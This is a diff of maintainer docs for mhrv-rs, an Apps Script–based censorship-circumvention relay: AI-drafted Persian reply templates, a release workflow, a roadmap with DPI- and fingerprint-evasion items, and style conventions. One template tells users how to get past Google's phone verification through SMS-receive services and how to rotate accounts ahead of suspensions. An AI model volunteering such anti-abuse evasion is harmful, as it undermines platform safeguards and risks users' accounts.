+این الگو شناخته‌شده‌ست + در اساس Google's anti-abuse system فلاگ می‌کنه new accounts که immediately Apps Script deployment می‌سازن (مخصوصاً بدون phone verification).
+
+**Stage تشخیص account flag:**
+
+```
+Stage 1: "Action required - add phone number"
+   ↓ (phone اضافه می‌شه) → account stable
+   ↓ (phone اضافه نمی‌شه + automation activity ادامه می‌ده)
+   ↓
+Stage 2: "Account temporarily restricted"
+   ↓ (Apps Script deployments شروع می‌کنن Workspace landing HTML برگردونن
+   ↓  به‌جای execute کردن — see #421 + cause #6 در v1.8.3 detection)
+   ↓
+Stage 3: "Account suspended" — full lockout، deployments fail
+```
+
+شما الان در Stage 1. اگر زود phone verify کنید، account stable می‌مونه + deployments بدون مشکل ادامه می‌دن.
+
+**درباره نگرانی شما از ban کلی Google account:**
+
+در history reports این پروژه (~۵۰+ کاربر در طول سال گذشته)، **هیچ confirmed case full account ban** ندیدم. consequences scope-شده به Apps Script + UrlFetchApp quota — نه Gmail یا Drive یا سایر Google services. accounts با history regular usage (Gmail, Drive files، etc.) و age چند سال، برای personal CodeFull.gs deployment در دسته‌ی low-risk قرار دارند.
+
+**workarounds:**
+
+**۱. بهترین: phone اضافه کنید.**
+
+Iranian phone گاهی filter می‌شه، ولی می‌توانید:
+
+- phone یک friend/family member outside Iran استفاده کنید (SMS code رو forward کنند)
+- TextNow / Google Voice (US) / paid SMS-receive services
+- بعضی موارد Google یک phone رو روی چند account قبول می‌کنه (~۵ account per phone limit)
+
+**۲. اگر phone نمی‌توانید:**
+
+accounts احتمالاً به Stage 2-3 progress می‌کنن طی روزها-تا-هفته. برای حفظ service:
+
+- deployments جدید زیر accounts متفاوت بسازید قبل از اینکه old fail کنه
+- از **community shared deployment** workflow ([#325](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/325)) استفاده کنید — friend با account stable deployment می‌سازه + ID share می‌کنه + AUTH_KEY مشترک
+
+**۳. برای access به script.google.com وقتی شبکه slow:**
+
+می‌توانید از **mhrv-rs خود** برای access به script.google.com استفاده کنید. mhrv-rs's HTTP proxy به browser → CONNECT tunneling به Google عمل می‌کنه (نه UrlFetchApp.fetch — که Google block می‌کنه). browser رو با proxy `127.0.0.1:8086` تنظیم کنید + بروید script.google.com.
+
+**Action item:**
+
+اگر Stage 1 هستید (notification اومده ولی deployments هنوز کار می‌کنن): فوراً phone verify کنید.
+
+اگر Stage 2 هستید (deployments شروع کردن به برگردوندن Workspace HTML): همان، plus rotation deployment‌ها به accounts سالم.
+
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
+```
+
+## Template 6: Architectural limit (Google services + UrlFetchApp self-loop)
+
+For users asking why `cloud.google.com` / `colab` / `gmail` / `meet` / `gemini` doesn't work:
+
+```markdown
+این محدودیت **architectural** است + ربطی به config یا setup شما نداره.
+
+**Apps Script's UrlFetchApp self-loop restriction:**
+
+`UrlFetchApp.fetch()` Google در API hardcoded ساخته که نمی‌تونه به دامنه‌های `*.google.com` / `*.googleapis.com` / `*.gstatic.com` request بفرسته. Apps Script یا empty response می‌ده یا 4xx/5xx error.
+
+این محدودیت **Google ست** (نه implementation ما) + در Apps Script API documentation هم ذکر شده. هیچ HTTP-relay مبتنی بر Apps Script نمی‌تونه به Google services از Apps Script→Google path برسه.
+
+**سایت‌های متأثر:**
+
+- `cloud.google.com` — Console
+- `colab.research.google.com` — Colab
+- `gemini.google.com` — Gemini chat
+- `drive.google.com` — Drive
+- `docs.google.com` / `sheets.google.com` / `slides.google.com` — Workspace
+- `meet.google.com` — Meet (Web)
+- `mail.google.com` — Gmail
+- `script.google.com/home/usage` — Apps Script dashboard
+- `*.google.com` به‌طور کلی
+
+**راه‌حل‌ها:**
+
+**۱. سایت‌های alternative:**
+
+- به‌جای Drive: WebDAV / Mega / Cloudflare R2
+- به‌جای Colab: Kaggle Notebooks / Jupyter Lab روی VPS
+- به‌جای Gemini: ChatGPT (openai.com) / Claude (claude.ai) — اگر CF block نشدن، کار می‌کنن
+- به‌جای Cloud Console: SSH مستقیم یا cloud provider's CLI
+
+**۲. Full mode + VPS:**
+
+VPS از طرف خود به Google direct وصل می‌شه. در Full mode، traffic Google رو می‌توانید با xray dual-routing از mhrv-rs bypass کنید. detail در [#420](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/420). با این setup همه‌ی Google services از طریق VPS direct کار می‌کنن.
+
+**۳. VPN موقت:**
+
+برای access گاه‌گاهی به Google services (مثلاً برای download فایل از Drive یا setup OAuth)، یک VPN موقت ۱۰ دقیقه‌ای استفاده کنید + سپس به mhrv-rs برمی‌گردید.
+
+**نتیجه:**
+
+اگر می‌خواهید سایت‌های Google کار کنن با همان setup mhrv-rs که الان دارید، نیاز به Full mode + VPS + xray routing است. تا وقتی فقط apps_script mode دارید، Google services unreachable می‌مونن.
+
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
+```
+
+## Common Persian phrases for inline use
+
+When writing custom replies, these phrases come up frequently and should be standardized:
+
+| Concept | Persian phrasing |
+|---------|------------------|
+| "redeploy as new version" | `redeploy as new version کنید (نه head)` |
+| "exact match" | `دقیقاً match کنه` / `exact match` |
+| "case-sensitive" | `case-sensitive است` |
+| "ISP throttle" | `ISP throttle` (English term; transliteration is not used) |
+| "narrow down" | `narrow کنیم` |
+| "share the log" | `log رو share کنید` |
+| "thanks for the report" | `ممنون از گزارش` / `تشکر از گزارش` |
+| "I owe you" / "apologies" | `معذرت می‌خوام بابت` |
+| "for your specific case" | `برای case خاص شما` |
+| "unfortunately" | `متأسفانه` |
+| "the workaround is" | `workaround این هست که...` |
+| "this is a known issue" | `این مشکل شناخته شده است` |
+| "feature is queued" | `feature در roadmap است` |
+| "we'll ship in v1.x.y" | `در v1.x.y ship می‌شه` |
+| "configuration file" | `فایل config` |
+| "command line" | `command line` / `terminal` / `ترمینال` |
+| "deployment" (Apps Script) | `deployment` (transliterated `دپلوی` is not used in this project) |
+| "tunnel" (Full mode) | `tunnel` |
+| "browser" | `browser` / `مرورگر` |
+| "system proxy" | `system proxy` |
+| "page loads but X doesn't work" | `page بالا میاد ولی X کار نمی‌کنه` |
+| "I tested with curl" | `با curl تست کردم` |
+| "the bug is fixed in vX.Y.Z" | `bug در vX.Y.Z حل شده` |
+| "thanks for catching this" | `ممنون از catch کردن این` |
+| "let me know if it works" | `اگر کار کرد گزارش بدید` |
+| "if it fails again, share the log" | `اگر دوباره fail کرد، log رو share کنید` |
+
+These let Persian replies use English technical terms naturally without forced transliteration, which matches how Iranian developers actually talk.
diff --git a/docs/maintainer/references/release-workflow.md b/docs/maintainer/references/release-workflow.md
new file mode 100644
index 00000000..7e5b0698
--- /dev/null
+++ b/docs/maintainer/references/release-workflow.md
@@ -0,0 +1,211 @@
+# Release workflow
+
+Cutting a release is fast and low-ceremony for this project. Most releases are patch bumps that go from "decision to ship" to "Telegram channel posting" in under 30 minutes of human work + ~30 minutes of CI.
+
+## When to cut a release
+
+Cut a release whenever **anything user-visible** has landed since the last tag. User-visible includes:
+
+- Bug fixes that affect runtime behavior
+- New config options
+- New CLI subcommands or flags
+- Diagnostic improvements (better log messages, error categories)
+- Apps Script script changes (Code.gs / CodeFull.gs)
+- Documentation that users will read (README updates, troubleshooting docs — though these can also batch into the next release)
+
+Don't cut for:
+- Internal refactors with no behavior change
+- CI/workflow file edits
+- Markdown formatting fixes
+- Test-only changes
+
+When in doubt, cut. Patch releases are cheap and Iranian users actively check the Telegram channel for updates.
+
+## The release workflow
+
+### Step 1: Decide the version
+
+Read the latest tag:
+
+```bash
+git describe --tags --abbrev=0
+```
+
+Then bump:
+- **Patch (Z+1)** — for ~95% of releases. v1.8.2 → v1.8.3
+- **Minor (Y+1)** — for a coherent feature batch shipped together. v1.7.x → v1.8.0 represented "DPI evasion + active-probing defense + full-mode usage counters" together
+- **Major (X+1)** — never done in this project's history. Reserved for true protocol-incompatible changes with the Apps Script side. Don't bump major without explicit go-ahead.
+
+### Step 2: Bump `Cargo.toml`
+
+Edit `Cargo.toml` line 3 (`version = "X.Y.Z"`). Keep package name `mhrv-rs` unchanged. The `tunnel-node` subcrate has its own version that's independent — don't bump it unless you're shipping a tunnel-node change.
+
+### Step 3: Build to refresh `Cargo.lock`
+
+```bash
+cargo build --release 2>&1 | tail -3
+```
+
+`Cargo.lock` will pick up the new version string. Verify with:
+
+```bash
+git diff Cargo.lock | head -20
+```
+
+Should show only the `name = "mhrv-rs"` block's `version = "X.Y.Z"` change.
+
+### Step 4: Write the changelog
+
+Create `docs/changelog/vX.Y.Z.md` using the format in `assets/changelog-template.md`. Persian first, then `---`, then English. See `workflow-conventions.md` for format details.
+
+When the release is shipping multiple PRs from contributors, credit each by name + handle in both halves of the changelog.
+
+### Step 5: Run tests + final build
+
+```bash
+cargo test --lib 2>&1 | tail -5
+cargo build --release 2>&1 | tail -3
+cargo build --bin mhrv-rs-ui --release --features ui 2>&1 | tail -3
+```
+
+All three must succeed. Test count varies by version. All passing is the gate.
+
+If any contributor PRs were merged in this release, also verify by re-running tests after the merge — sometimes integration with main reveals issues that didn't show in the PR's CI.
+
+### Step 6: Commit + tag + push
+
+```bash
+git add Cargo.toml Cargo.lock docs/changelog/vX.Y.Z.md
+git status  # sanity check
+git commit -m "$(cat <<'EOF'
+chore: vX.Y.Z — <short summary fitting under 75 chars>
+
+<longer body explaining the why and the changes — see workflow-conventions.md
+for format>
+EOF
+)"
+
+git push origin main
+git tag vX.Y.Z
+git push origin vX.Y.Z
+```
+
+The `git push origin vX.Y.Z` is the trigger — release CI auto-fires on tag push.
+
+If `git push origin main` fails with `non-fast-forward`, someone (often the auto-binary-refresh CI from a prior release) pushed in the meantime:
+
+```bash
+git pull --rebase origin main
+git push origin main
+git tag vX.Y.Z   # if you didn't tag yet
+git push origin vX.Y.Z
+```
+
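+If you already tagged locally before the push race (and have not pushed the tag yet), re-point the tag before pushing it: `git pull --rebase` replays your commit on top of the new upstream commits, which gives it a new SHA, so the existing tag still references the pre-rebase commit that is not on `main`. Run `git tag -f vX.Y.Z` after the rebase, then `git push origin vX.Y.Z`.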
+
+### Step 7: Watch CI
+
+```bash
+gh run list --limit 3
+```
+
+Two workflows fire on tag push:
+1. **`release-drafter`** — quick (~15s), updates the GitHub release draft. Always succeeds.
+2. **`release`** — slow (~25-35 minutes), builds binaries for all platforms, attaches to release.
+
+Once `release` succeeds, a third workflow auto-fires:
+3. **`Telegram publish release files`** — posts each binary individually to the Telegram channel `mhrv_rs` with Persian captions, SHA-256 hashes, and a cross-link from the main channel. Takes ~1-2 minutes.
+
+If `release` fails, common causes:
+
+- **Cross-compile failure** — particularly on i686 / mipsel. i686 was dropped from the matrix in v1.7.11 because of MSRV churn (see #411 thread). If a new architecture starts failing, it's usually a transitive dep bumping MSRV past what the toolchain pinned for that target supports. Triage: check which architecture's job failed, look at the cargo error, decide whether to pin a dep with `cargo update --precise` or drop the architecture.
+- **`actions/download-artifact@v4` flakiness** — replaced with `gh run download` + 3-attempt retry in v1.7.11. Should be stable now; if it flakes again, increase retry count.
+
+After CI succeeds, optionally check the binary refresh:
+
+```bash
+git pull origin main
+git log --oneline -3
+```
+
+You should see an auto-generated commit `chore(releases): refresh prebuilt binaries for vX.Y.Z` from the release CI bot.
+
+### Step 8: Verify Telegram channel
+
+The Telegram publish workflow posts to channel `mhrv_rs` (public link `https://t.me/mhrv_rs`). The channel should show:
+
+1. An announcement post: `📦 mhrv-rs vX.Y.Z منتشر شد...` referencing the changelog file
+2. ~16 individual file posts (Android APKs split by ABI, Windows ZIP, macOS arm64/amd64 dmg+tar, Linux x86_64/arm64 incl. musl, Raspbian, OpenWRT)
+3. Each file caption includes Persian description (e.g., "نسخه ویندوز x86") + SHA-256 hash
+4. A "main channel" post (different channel) cross-linking to the files channel post
+
+Files larger than 50 MB get chunked into `.part_aa`, `.part_ab`, etc. via the `split` pattern in `.github/scripts/telegram_publish_files.py`.
+
+If something didn't post, check the workflow run logs:
+
+```bash
+gh run view <run-id> --log
+```
+
+Common cause: the auto-fire dispatch on `workflow_run` requires the parent workflow to succeed; if release.yml had a flaky download retry, the dispatch might still succeed but publish only part of the files.
+
+## Manual re-publish (rare)
+
+If you need to re-trigger Telegram publishing for an already-released version (e.g., the workflow failed and you fixed it), use `workflow_dispatch`:
+
+```bash
+gh workflow run "Telegram publish release files" -f version=vX.Y.Z
+```
+
+The script downloads artifacts via `gh release download` (not the workflow's artifacts) so it works retroactively.
+
+## Re-cutting a release (very rare)
+
+If a release was tagged and pushed but turns out to be broken (e.g., bug in a merged PR you wanted to revert):
+
+1. **Don't** delete the tag if the release is already public. Iranian users may have already pulled the binaries; a deleted tag confuses them and they think the project is gone.
+2. Cut a fix immediately as the next patch (vX.Y.Z+1).
+3. Optionally edit the GitHub release notes for the broken version to say "known issue, upgrade to vX.Y.Z+1".
+
+If you tagged but didn't push yet, just delete the tag locally and re-tag after fixing:
+
+```bash
+git tag -d vX.Y.Z   # local only; safe
+# fix the issue, commit
+git tag vX.Y.Z
+git push origin vX.Y.Z
+```
+
+## Pre-release rollback
+
+If `cargo test --lib` fails after merging PRs but before tagging:
+
+1. Don't tag.
+2. Either revert the merge commit (`git revert <merge-commit-sha>`) or fix forward (commit a new fix on main).
+3. Re-run tests until green.
+4. Tag.
+
+The release CI fires only on a tag push and doesn't run tests before building, so an untagged-but-broken main is harmless — you have time to fix it — but the local test run is the only gate, so never tag until it is green.
+
+## Coordinating with multiple PRs in flight
+
+If two PRs are both ready to merge, the order matters:
+
+- Merge them one at a time (not both into a single tag) **only** if they're independent
+- If they touch the same files, merge them sequentially with `gh pr checkout N1 && cargo test && merge`, then `gh pr checkout N2` (which now bases on the new main; CI on the PR may show the old base, but the local checkout sees latest main) `&& cargo test && merge`
+- If a merge introduces conflicts, GitHub's UI flags the PR as conflicting; resolve via `gh pr checkout N` + manual rebase + push to the PR branch
+
+After all PRs are merged, **then** bump version, write changelog (covering all merged PRs), tag, push.
+
+## Versioning the tunnel-node subcrate
+
+`tunnel-node/Cargo.toml` has its own version field separate from the main crate. Bump it when:
+
+- Changing the tunnel-node HTTP API (`/tunnel`, `/batch` endpoints)
+- Changing the auth flow (`TUNNEL_AUTH_KEY` semantics)
+- Changing the env var contract
+- Bumping the Docker image label
+
+For pure internal refactors of tunnel-node that don't change the surface, leave it alone — the Docker image at `ghcr.io/therealaleph/mhrv-tunnel-node:latest` continues to be the latest tag and users don't need to know an internal version bumped.
+
+When tunnel-node version bumps, the Docker image gets re-tagged in the registry by the CI. Users running `docker pull ghcr.io/therealaleph/mhrv-tunnel-node:latest` get the new version automatically; users pinned to a specific version stay pinned.
diff --git a/docs/maintainer/references/roadmap.md b/docs/maintainer/references/roadmap.md
new file mode 100644
index 00000000..5a1482bd
--- /dev/null
+++ b/docs/maintainer/references/roadmap.md
@@ -0,0 +1,118 @@
+# Roadmap
+
+This is the project's queued work, organized by release batch. Use it when:
+- Categorizing a new feature request from a user (which batch does this fit?)
+- Cross-referencing roadmap items in your replies ("queued for v1.8.x")
+- Deciding what to ship in the current batch vs deferred
+
+Update this file when items ship (move to "shipped") or when new items are added (cluster with similar items in the right batch).
+
+## v1.8.x (current batch — small fixes + diagnostics + Android UI)
+
+The v1.8.x line is a **small-and-frequent** release pattern. Each release ships one or two completed items rather than batching many. The theme is "diagnostic improvements + Android UX + Apps Script script enhancements".
+
+### Shipped
+
+- ✅ **v1.8.0**: Random padding (DPI evasion), auto-blacklist deployments, decoy responses, full-mode usage counters, active-probing defense, DIAGNOSTIC_MODE flag in Code.gs
+- ✅ **v1.8.1**: Decoy detection client-side (with v1.8.2/v1.8.3 corrections), `script_id` in error logs, `disable_padding` config flag
+- ✅ **v1.8.2**: UI binary tracing reads `config.log_level` (with reload handle for live changes), softer 4-cause decoy detection error message
+- ✅ **v1.8.3**: Spreadsheet-backed response cache (Code.gs, opt-in), DoH bypass for known DoH endpoints, H1 container keepalive (240s), 64 KB header cap with HTTP 431, clearer port-collision error message
+
+### Queued (small, can ship in next 1-3 patch releases)
+
+- **v1.8.4 candidate items**:
+  - Soften decoy detection further with the 6-cause taxonomy (Persian quota body + Workspace landing HTML detection)
+  - Per-`script_id` rolling-window error-category counter visible in CLI/UI
+  - run.bat auto-fallback to CLI when both UI renderers fail (#417 / #426)
+  - TUNNEL_AUTH_KEY startup warning when `MHRV_AUTH_KEY` is set without `TUNNEL_AUTH_KEY` (catches the recurring #391-style env var typo)
+  - Range-aware splicing in Code.gs (lets large downloads work via HTTP Range requests, partial fix for #441)
+
+### Queued (medium-effort, batch into focused release)
+
+- **`googlevideo_ip` config field** (#300) — separate `google_ip` for googlevideo.com vs other Google domains. Some users have one IP that works for the latter but not the former. Approx 1-2 days of work.
+- **DNS ad-blocking via StevenBlack/hosts** (#377) — opt-in DNS-level filtering during SOCKS5/MITM dispatch. Reduces upstream calls for ad-domains.
+- **DNS caching + parallel dispatch via hickory-resolver** (#377) — replace blocking DNS with cached + parallel resolver. Substantial latency win for browser pageloads.
+- **Tunable strike-counter threshold for auto-blacklist** (#391) — single-deployment users currently hit the auto-blacklist after a few transient errors and end up with no working deployment. Make threshold configurable.
+- **`block_quic` 3-state UI toggle** (#361 / #377) — off / drop / reject (default reject = ICMP unreachable, instant Happy Eyeballs failover). 2bemoji's design.
+- **Android UI batch** (#285 / #361 / #261 / #295 / #254 / #313 / #375):
+  - block_quic toggle
+  - youtube_via_relay toggle
+  - listen_host editor
+  - passthrough_hosts editor
+  - Active deployment indicator
+  - Per-deployment quota counters
+  - Android disconnect crash fix (#418)
+- **System proxy toggle** (#432) — Windows/macOS/Linux desktop UI: on Connect set system HTTP proxy to mhrv-rs, on Disconnect clear. With crash-rollback so a hung mhrv-rs doesn't leave system proxy stuck.
+- **`script_ids_url` dynamic config** (#433) — config field pointing at an HTTPS URL that returns a JSON list of deployment IDs. mhrv-rs fetches at startup + every TTL. Lets distributors update deployment lists for many users without each editing config manually.
+- **In-app updater via mhrv-rs's own proxy** (#366) — let mhrv-rs check for updates + download new binaries through its own relay (avoiding the chicken-and-egg of "I can't reach github.com to update mhrv-rs"). Defense in depth.
+- **Temporal jitter** (#369 §2) — randomize timing of batch dispatches to defeat timing-correlation DPI.
+- **`tls_verify` config** (#430 / masterking32 PR #26) — opt-in to skip upstream TLS verification for self-signed certs. Trade-off: opens MITM-of-MITM risk; needs careful design.
+- **`request_timeout` configurable** (#430 / masterking32 PR #25) — currently hard-coded `BATCH_TIMEOUT = 30s`. Make configurable for users on slow networks who want longer timeouts.
+- **CF Workers backend audit** (#380 / #393) — test mhr-cfw compatibility. If it works, document as alternative backend.
+
+### Documentation queued
+
+- **`docs/full-mode-google-bypass.md`** (#420) — dual-routing in xray for users with Iranian VPS xray entry topology
+- **`docs/full-mode-iran-vps-setup.md`** (#420) — full step-by-step for the dual-VPS topology (Iranian xray entry + non-Iranian tunnel-node exit)
+- **`docs/iran-mirrors.md`** (#422) — community-maintained Iranian CDN mirrors for users who can't reach github.com. Pending SHA-256 verification of @amintoorchi's xdevteam.liara.space mirrors.
+- **`docs/win7-build.md`** (#411) — manual Cargo.lock downgrade + cargo update --precise chain for community Win7 32-bit builds. Officially unsupported since v1.7.11 but the build path works for technical users.
+- **`docs/faq/android.md`** — user trust store explanation, which apps work, why Gmail/YouTube don't, root + Magisk option
+- **Updates to README** — short explanation of dual-routing for Google services + xray config snippet
+
+## v1.9.0 (headline release — xmux)
+
+The v1.9.0 release is the **xmux** feature: stream splitting across multiple Apps Script deployments at byte-range level. Currently in design / RFC stage (#369).
+
+### Design goals
+
+- **Survivability under ISP RST** — when one deployment's TCP connection gets RST-injected mid-stream, other deployments continue to carry remaining byte ranges
+- **Latency reduction** — small responses can hit any of N deployments first; mhrv-rs takes the first to respond
+- **Bandwidth aggregation** — large downloads chunk across deployments concurrently. 5 deployments × 10 MB/s each ≈ 50 MB/s aggregate (subject to per-deployment caps)
+- **SABR cliff mitigation** — long YouTube streams chunk into <30s windows across deployments; each window finishes within Apps Script's response cap, then mhrv-rs reassembles
+
+### Open design questions
+
+- **Reordering buffer size** — bigger = more memory; smaller = more retries on out-of-order
+- **Failure recovery** — if a deployment fails mid-chunk, who picks up the half-served range?
+- **Idempotency** — POST requests are tricky; current design only handles GET safely
+- **State consistency** — if some chunks come from cache and some don't, ETag/Last-Modified handling needs care
+- **Configurability** — when does a user want xmux on (latency-sensitive) vs off (quota-sensitive)?
+
+### Implementation timeline
+
+- 4-6 weeks of design + implementation
+- Tag @w0l4i, @2bemoji, @ipvsami, @dazzling-no-more, @euvel as core reviewers when design issue is filed
+
+The design issue should be filed after the v1.8.x batch settles (so the queue isn't too long).
+
+## v1.9.x and beyond (longer-horizon)
+
+These are committed to the project's roadmap but not actively in design. Listed for traceability when users ask "are you planning X?".
+
+- **Cloudflare WARP integration** (#309) — outbound traffic exits via Cloudflare WARP after Apps Script. Lets sites that flag Google IPs (most CF-protected) see traffic as Cloudflare-residential. Feasibility uncertain — needs CF account + WARP wireguard interface integration.
+- **TLS fingerprint randomization** (#369 §2) — randomize JA3/JA4 across deployments. Defeats CF / commercial bot detection.
+- **tunnel-node UPSTREAM_SOCKS5 chain** (#333 kanan-droid) — let tunnel-node forward through a SOCKS5 upstream (e.g., another VPN). Defense in depth + IP variety.
+- **Tier-3 i686-win7-windows-msvc target** (#411) — Windows 7 32-bit support via tier-3 target with `-Z build-std`. Needs nightly Rust. Roadmap v1.9.x or v2.x.
+- **Web frontend / dashboard** (#384) — landing page for the project. Low priority but recurring request.
+- **In-app changelog viewer** — show changelog for new version inside mhrv-rs UI when an update is available (small UX polish).
+
+## How to use this when triaging issues
+
+When a feature request comes in:
+
+1. Match the request to an existing item in this list. If found, reply: "Queued for v1.8.x [or whichever batch]. ETA ~X weeks. See [#NNN](#) for the canonical thread."
+2. If it's a duplicate of an existing roadmap item, close as duplicate of the canonical issue.
+3. If it's a new request not on this list:
+   - Substantive feature: add to v1.8.x or v1.9.x list as appropriate, note the issue number, reply with the planned bucket
+   - Long-horizon / uncertain: add to v1.9.x and beyond, reply that it's noted but no timeline
+   - Architectural impossibility (UrlFetchApp self-loop, MTProto, etc.): close with explanation, link to architectural reference
+
+## Roadmap velocity
+
+The project ships v1.x.y patches frequently — typically 1-3 per week during active development. Minor (1.x) bumps happen every few months. v1.0 → v1.8 took ~12 months. So:
+
+- "v1.8.x ETA" usually means "next 1-2 weeks" for small items, "next 1-2 months" for big items
+- "v1.9.0 ETA" usually means "next 2-3 months"
+- "v1.9.x" or "v2.x" means "no specific timeline, but committed to consider"
+
+Be honest with users about timelines. Iranian users especially appreciate knowing whether to wait or pursue alternatives.
diff --git a/docs/maintainer/references/workflow-conventions.md b/docs/maintainer/references/workflow-conventions.md
new file mode 100644
index 00000000..f3c3ba89
--- /dev/null
+++ b/docs/maintainer/references/workflow-conventions.md
@@ -0,0 +1,174 @@
+# Workflow conventions
+
+These are the writing conventions, formatting rules, and tone guidelines for everything that goes into the public repo or out to users. Internalize these — they're applied to every issue reply, every commit message, every changelog, every PR description.
+
+## The reply marker
+
+Every substantive issue or PR comment ends with this exact footer:
+
+```
+---
+<sub>[reply via Anthropic Claude | reviewed by @therealaleph]</sub>
+```
+
+That's a literal Markdown horizontal rule, then the `<sub>...</sub>` line. The `[reply via Anthropic Claude | reviewed by @therealaleph]` text is verbatim — same brackets, same pipe, same case, same `@therealaleph` mention.
+
+**Why this exists**: replies are drafted by Claude and reviewed by the maintainer before posting. The marker signals this to the user. Users in this community know this convention and rely on it.
+
+**Don't omit it**, don't translate "reviewed by" into Persian, don't paraphrase the format. The marker stays the same regardless of whether the rest of the reply is in Persian or English.
+
+**Where it doesn't go**: very short comments like "Dup of #423." or "Closing as resolved." or close-comments via `gh issue close --comment "..."`. The marker is for substantive replies. Trivial close comments don't need it.
+
+## Persian or English: match the user
+
+The repo's userbase is majority Persian-speaking. Writing in their language matters — both for clarity (technical context lands better) and for respect (assuming everyone wants English is wrong).
+
+**Match what the user wrote**:
+- User wrote in Persian → reply in Persian
+- User wrote in English → reply in English
+- User wrote a mix → match the dominant language; if it's roughly even, prefer Persian since most mixed-language Iranian users default to Persian for nuance and English for technical terms
+
+**Things that always stay in original Latin form**, regardless of reply language:
+- Code blocks (Rust, JSON, bash, JS — all stay as-is)
+- Command-line examples (`gh issue close N`, `cargo build`, `docker run ...`)
+- Technical identifiers: `AUTH_KEY`, `TUNNEL_AUTH_KEY`, `script_id`, `parallel_concurrency`, `disable_padding`, `tunnel_doh`, `bypass_doh_hosts`, `DIAGNOSTIC_MODE`, `passthrough_hosts`, `google_ip`, `mode: "full"` / `mode: "apps_script"`
+- Filename references: `Code.gs`, `CodeFull.gs`, `config.json`, `tunnel-node`, `mhrv-rs.exe`, `MhrvVpnService.kt`, `domain_fronter.rs`
+- URLs and links
+- The reply marker
+- Issue references like `#404`, `#313`
+- HTTP status codes (`502`, `504`, `403`)
+
+**Don't**:
+- Translate command names or function names
+- Mix Persian text into code blocks (unless user did so in their own paste)
+- Use machine-translation for the Persian — write it natively
+
+**Persian register**: write at "polite professional" level — `می‌فرمایید` over `می‌گی`, `لطفاً` (please), full pronouns when needed. Iranian GitHub users tend to write fairly formally; match that. Use Persian punctuation conventions: `،` (Persian comma), `؛` (Persian semicolon), `؟` (Persian question mark) — though comma in lists is acceptable as `،` or `,` per style preference.
+
+## Public artifact tone
+
+Anything that goes into the public repo — issue replies, PR comments, commit messages, PR descriptions, changelogs — is full prose, written warmly and clearly. Iranian users especially read carefully and brevity reads as cold or dismissive in this context. Use full sentences. Explain reasoning. Be patient.
+
+## Changelog format
+
+Every release has a file at `docs/changelog/vX.Y.Z.md`. The format is strict:
+
+```markdown
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• [bullet 1 in Persian, with markdown links to issue numbers]
+• [bullet 2 in Persian]
+• [bullet 3 in Persian]
+---
+• [same bullet 1 in English, written natively, not machine-translated]
+• [same bullet 2 in English]
+• [same bullet 3 in English]
+```
+
+Conventions:
+
+- **Use `•` (U+2022 bullet)**, not `-` or `*`. The Persian half uses bullets because Markdown unordered lists don't render naturally with Persian RTL text in the GitHub Releases page.
+- **Issue/PR links**: full GitHub URLs in markdown form: `[#404](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/404)`. Don't use bare `#404` in changelogs — they don't auto-link in the Persian section.
+- **Same content both halves** — they cover the same bullets, in the same order. Not necessarily verbatim translation; the Persian is written for Persian readers and may use slightly different framing.
+- **Length**: each bullet should describe what changed AND why it matters. "Added DoH bypass" is too thin; "DoH lookups now route around the Apps Script tunnel via plain TCP, saving the ~2s UrlFetchApp roundtrip per name without losing privacy (DoH is already encrypted)" is the right depth.
+- **Credit contributors**: if a PR landed from a community contributor, say so by name + handle. Persian: `از @euvel`. English: `by @euvel`.
+- **Backwards-incompatible changes**: rare for this project, but flag prominently if any. Add `**شکستگی سازگار**` / `**Breaking change**` prefix.
+
+The starter template is at `assets/changelog-template.md`.
+
+## Commit messages
+
+Format:
+
+```
+<type>: vX.Y.Z — <short summary>
+
+<longer prose body explaining the why and the changes>
+
+[optional: bullet list of specific changes]
+```
+
+Types in regular use:
+- `feat:` — new feature, user-visible (most common)
+- `fix:` — bug fix
+- `chore(releases):` — auto-fired CI commit refreshing prebuilt binaries
+- `chore:` — version bump, dep update, etc.
+- `docs:` — documentation-only changes
+- `ci(workflow-name):` — workflow file changes
+- `feat(area):` — feature scoped to a specific subsystem (e.g., `feat(code.gs):`, `feat(drive):`)
+
+Example commit message:
+
+```
+feat: v1.8.3 — sheet cache + DoH bypass + H1 keepalive + 431 + clearer errors
+
+Three substantive PRs from contributors landed for this release:
+
+- #443 by @euvel: optional spreadsheet-backed response cache in Code.gs.
+  Implements all 5 review suggestions from the design discussion (#400):
+  TTL-aware caching, 35 KB body-size gate, header rewriting on hit,
+  circular buffer for O(1) writes, Vary-aware compound keys.
+
+- #439 by @dazzling-no-more: bypass Apps Script tunnel for known DoH
+  endpoints on TCP/443. Cloudflare/Google/Quad9/AdGuard/NextDNS/OpenDNS/
+  ...
+```
+
+Conventions:
+- **Subject line under 75 chars** (GitHub truncates longer)
+- **Body wrapped at ~75-80 chars** for terminal-readability
+- **PR-merge commits**: when merging PRs via `gh pr merge --merge`, use `--subject` and `--body` to write the merge commit. Format is the same — type prefix, short summary, body explaining what shipped and credit.
+
+## Issue close reasons
+
+Always pass `--reason`:
+
+- `--reason completed` — the user's problem was resolved (their fix worked, or our fix shipped + they confirmed). For close comments, brief acknowledgement is fine; full marker not required.
+- `--reason "not planned"` — duplicate, architectural limit, won't-fix, or stale and unrecoverable. Always link to the canonical thread when closing as duplicate.
+
+For close comments, always include the destination issue if duplicate:
+
+```
+gh issue close N --reason "not planned" --comment "Closing as duplicate of #420 — full discussion + workarounds there."
+```
+
+## File names for reply markdown
+
+Convention: write reply markdown to a temp file (e.g., `/tmp/r-<issue>-<topic>.md`) before posting via `gh issue comment N --body-file <path>`.
+
+Examples:
+- `/tmp/r-404-quota.md` — reply to #404 about a quota observation
+- `/tmp/r-414-decoy.md` — reply to #414 about the decoy body
+- `/tmp/r-pr-merged.md` — generic "merged + included in vX.Y.Z" PR thank-you reply
+
+**Why use files instead of inline `--body`**: the inline `--body` argument runs through the shell, which interprets backticks (\`code\`) and `$()` substitutions. Issue replies frequently contain bash command examples with these patterns. The file approach sidesteps the quoting hell entirely. Use it by default.
+
+The exception is very short replies like `Dup of #423.` — those can use `--body "Dup of #423."` directly.
+
+## Tone
+
+- **Warm but technical**. Iranian users in particular often write apologetically ("sorry for using AI for the translation", "sorry to bother") — answer them as you'd want to be answered: with care, with technical depth, with explicit acknowledgment that their report is valuable.
